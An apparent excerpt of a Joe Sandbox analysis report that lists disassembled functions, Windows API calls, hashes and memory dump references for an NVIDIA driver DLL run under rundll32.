                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                    • String ID: ?
                                                                    • API String ID: 3458911817-1684325040
                                                                    • Opcode ID: 22439416785a112f76fe9419c4e8c31dab3d3793bf624b84bd0cee521d5097a6
                                                                    • Instruction ID: 18fa43b76780a085fd33a8dc785e09328f87563211ea5b576bddd85177d0d2fd
                                                                    • Opcode Fuzzy Hash: 22439416785a112f76fe9419c4e8c31dab3d3793bf624b84bd0cee521d5097a6
                                                                    • Instruction Fuzzy Hash: 5A61E332A0AA42ABE760EF21E8401B97BA5FF447D4F440131EA5D43A95EF3CE855C768
                                                                    Function 00007FF8A8DB9080 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 153libraryloadertimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,?,?,?,?,00000020,00000000,?,00007FF8A8DB9596,?), ref: 00007FF8A8DB90BA
                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,00000020,00000000,?,00007FF8A8DB9596,?), ref: 00007FF8A8DB90CA
                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,00000020,00000000,?,00007FF8A8DB9596,?), ref: 00007FF8A8DB9269
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Time$AddressFileHandleModuleProcSystem
                                                                    • String ID: GetTickCount64$KERNEL32.DLL
                                                                    • API String ID: 1325709388-3320051239
                                                                    • Opcode ID: e5f6e237485dc9fb21dbce2a5ed82c903e844033b7c074c3668ca47f24bd9165
                                                                    • Instruction ID: 505deda3e98409c8c99d9e029db16455beff3d46cf3e0df1a91796f3cef94ac2
                                                                    • Opcode Fuzzy Hash: e5f6e237485dc9fb21dbce2a5ed82c903e844033b7c074c3668ca47f24bd9165
                                                                    • Instruction Fuzzy Hash: 90519162F2675699EF04DBA5E8500EC6371FB88BC8B445032EE1E1BB99EF3CE1058354
                                                                    Function 00007FF8A8CF1230 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalCurrentErrorInitializeLastSectionThread
                                                                    • String ID: NVSvc$NVSvc
                                                                    • API String ID: 2717818847-2528201179
                                                                    • Opcode ID: 8dcdf2550344e87295149939ece467c90dbcbdf0e4751995e937b7b7eb2bc959
                                                                    • Instruction ID: 24a02d050753987b9d64aa148ff1688c615626a6e98d1ac8d4ad45eaf32d42b0
                                                                    • Opcode Fuzzy Hash: 8dcdf2550344e87295149939ece467c90dbcbdf0e4751995e937b7b7eb2bc959
                                                                    • Instruction Fuzzy Hash: AD411231A0AB52F2F7418B14E8402B933A4FF64BD8F54013AD99D436A4EF7CA5B58778
                                                                    Function 00007FF8A8D03A6C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *), xrefs: 00007FF8A8D03AFA
                                                                    • c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h, xrefs: 00007FF8A8D03AF3
                                                                    • RegOpenKeyEx, xrefs: 00007FF8A8D03AC8
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_$CloseOpen__std_exception_copythrow_exception
                                                                    • String ID: RegOpenKeyEx$c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\RegistryKey.h$void __cdecl Nvidia::Logging::RegistryKey::CheckErrorCode(long,const char *)
                                                                    • API String ID: 239400870-1403648629
                                                                    • Opcode ID: f055ff398399059ae8927227b57d428e8287537a93d480e565a91b4db700cde7
                                                                    • Instruction ID: 33bb33a5880e76a903d97e657f7271bbdb7f6e81966c13661e3bf99c9608b1de
                                                                    • Opcode Fuzzy Hash: f055ff398399059ae8927227b57d428e8287537a93d480e565a91b4db700cde7
                                                                    • Instruction Fuzzy Hash: 5011B631B0AA82D2EB10CB29E45076973A0FB89BE4F404131DA6D477A4DF3CE555C758
                                                                    Function 00007FF8A8DE559C Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: fa9f4140ac8c3c0c1d9f647f0c4365783f45b4630c9665bc1a543104a0a27ffe
                                                                    • Instruction ID: b5268fe4d6c5d88c9de0753b042ab776d3a492e3a2c4f89721a2777f1cee0340
                                                                    • Opcode Fuzzy Hash: fa9f4140ac8c3c0c1d9f647f0c4365783f45b4630c9665bc1a543104a0a27ffe
                                                                    • Instruction Fuzzy Hash: 5E513E26D0AE46E7F622AE34944037A6372FF417D4F044B39D96D175D0FF3CA8998628
                                                                    Function 00007FF8A8D44120 Relevance: 7.6, APIs: 5, Instructions: 89COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00007FF8A8D04D08: WaitForSingleObjectEx.KERNEL32 ref: 00007FF8A8D04D62
                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A8DB8BF8), ref: 00007FF8A8D4417C
                                                                    • ReleaseSemaphore.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A8DB8BF8), ref: 00007FF8A8D44196
                                                                    • ReleaseSemaphore.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A8DB8BF8), ref: 00007FF8A8D441B7
                                                                      • Part of subcall function 00007FF8A8D04DB0: CreateEventA.KERNEL32 ref: 00007FF8A8D04DEA
                                                                      • Part of subcall function 00007FF8A8D04DB0: CloseHandle.KERNEL32 ref: 00007FF8A8D04E19
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A8DB8BF8), ref: 00007FF8A8D441F9
                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8A8DB8BF8), ref: 00007FF8A8D4422D
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Event$CloseHandleReleaseSemaphore$CreateObjectSingleWait
                                                                    • String ID:
                                                                    • API String ID: 1436492870-0
                                                                    • Opcode ID: df526144e84990efae223006a84edff3b767429f22f46508a8fe73c342c2743a
                                                                    • Instruction ID: f76284465001806a16eb0e71f8196d06a17dba19a4114794d6890e8bb22cbdec
                                                                    • Opcode Fuzzy Hash: df526144e84990efae223006a84edff3b767429f22f46508a8fe73c342c2743a
                                                                    • Instruction Fuzzy Hash: 2D319331A1BA0293EBA4CB25A45423E6762FB56BE0F144230DBBF47A91DF3CE4458758
                                                                    Function 00007FF8A8D14D74 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$LockitLockit::~_$ExceptionFacet_RegisterThrowstd::bad_alloc::bad_alloc
                                                                    • String ID:
                                                                    • API String ID: 4037175018-0
                                                                    • Opcode ID: 18ebb4d36de1deb9e8f84cc13266950ec36b17d3039d761a23553b459d15360a
                                                                    • Instruction ID: 002a5029a8430268844f00a8053a9a631af2935964acb1de47ae316aa83ce246
                                                                    • Opcode Fuzzy Hash: 18ebb4d36de1deb9e8f84cc13266950ec36b17d3039d761a23553b459d15360a
                                                                    • Instruction Fuzzy Hash: E1316531A0EA42B1EA11DB15E4400B96762FF847E4F580231DA7D03AE9DF3CE456C368
                                                                    Function 00007FF8A8D3C064 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$LockitLockit::~_$ExceptionFacet_RegisterThrowstd::bad_alloc::bad_alloc
                                                                    • String ID:
                                                                    • API String ID: 4037175018-0
                                                                    • Opcode ID: b8bb389a5e621f25b26d9608e0b2ee073185df6d26e955209668fd3c4078155f
                                                                    • Instruction ID: 2b30cae67858db47d438c8df2204b49cf47e22269e86144226f79b98442ee9f4
                                                                    • Opcode Fuzzy Hash: b8bb389a5e621f25b26d9608e0b2ee073185df6d26e955209668fd3c4078155f
                                                                    • Instruction Fuzzy Hash: E9315632A0EA42B1FB219B25E4400B96361EF947E4F180231DA7E03BE5DF3CE456D768
                                                                    Function 00007FF8A8D15270 Relevance: 7.6, APIs: 5, Instructions: 85COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$LockitLockit::~_$ExceptionFacet_RegisterThrowstd::bad_alloc::bad_alloc
                                                                    • String ID:
                                                                    • API String ID: 4037175018-0
                                                                    • Opcode ID: 38ee4250fbb25fc554b4fee117d75308bde01d93ea8f5b547f4d4860aced5323
                                                                    • Instruction ID: 55cdde7b3c9192494ab8413a422dabf4550cf41c625fb5009ec63d12e622b53a
                                                                    • Opcode Fuzzy Hash: 38ee4250fbb25fc554b4fee117d75308bde01d93ea8f5b547f4d4860aced5323
                                                                    • Instruction Fuzzy Hash: 03318532A0EA42B1EB159B15E8400BD6371EF847E4F180631DA7D03AE5DF3CE456C728
                                                                    Function 00007FF8A8D1F408 Relevance: 7.6, APIs: 5, Instructions: 85COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$LockitLockit::~_$ExceptionFacet_RegisterThrowstd::bad_alloc::bad_alloc
                                                                    • String ID:
                                                                    • API String ID: 4037175018-0
                                                                    • Opcode ID: 89e9db4c931ab1bf3cdbb28d2ba2b13d26839fe9728c879ca91f479a5de63860
                                                                    • Instruction ID: 7d6fe95e8baf400c6ee89f2f3499b80967ff0c4c6e6f775894db2a51fcd13f73
                                                                    • Opcode Fuzzy Hash: 89e9db4c931ab1bf3cdbb28d2ba2b13d26839fe9728c879ca91f479a5de63860
                                                                    • Instruction Fuzzy Hash: 8F311032A0EA42A1EB11DB25E5400B96761EF947E4F180632DA7D07BE9DF3CE456C728
                                                                    Function 00007FF8A8D1F700 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$LockitLockit::~_$ExceptionFacet_RegisterThrowstd::bad_alloc::bad_alloc
                                                                    • String ID:
                                                                    • API String ID: 4037175018-0
                                                                    • Opcode ID: 91d7009424cf7f8f6273e284ac38f090ccebdf3a332c76e25038c969edfad724
                                                                    • Instruction ID: 3f2cee0c2821c936527b5ef095784bea611924b35528aea5e80f8187db470469
                                                                    • Opcode Fuzzy Hash: 91d7009424cf7f8f6273e284ac38f090ccebdf3a332c76e25038c969edfad724
                                                                    • Instruction Fuzzy Hash: 4E313332A0EE42A1EB119B25E5400B96761EF947E4F180231DA6D43BE5DF3CE456C768
                                                                    Function 00007FF8A8D1F83C Relevance: 7.6, APIs: 5, Instructions: 85COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$LockitLockit::~_$ExceptionFacet_RegisterThrowstd::bad_alloc::bad_alloc
                                                                    • String ID:
                                                                    • API String ID: 4037175018-0
                                                                    • Opcode ID: f348b5a8d20156a74959f8356c0bad4ce0e4209d7e9d697c9d0d97b5adfd605d
                                                                    • Instruction ID: 1e99a749cc3bb8275e0da766bbf908b369f07f64c5ebbe2e3dd09f502961ba2d
                                                                    • Opcode Fuzzy Hash: f348b5a8d20156a74959f8356c0bad4ce0e4209d7e9d697c9d0d97b5adfd605d
                                                                    • Instruction Fuzzy Hash: BA315372A0EA42B1EB119B25E5400B96361FF947E4F180232DA7D03AE5DF3CE45AC768
                                                                    Function 00007FF8A8DDFFB0 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 2067211477-0
                                                                    • Opcode ID: b11c5641bf4848fb608eb9749dc857ac8897b4fee8caf6aa4f1a069ddcab5a7a
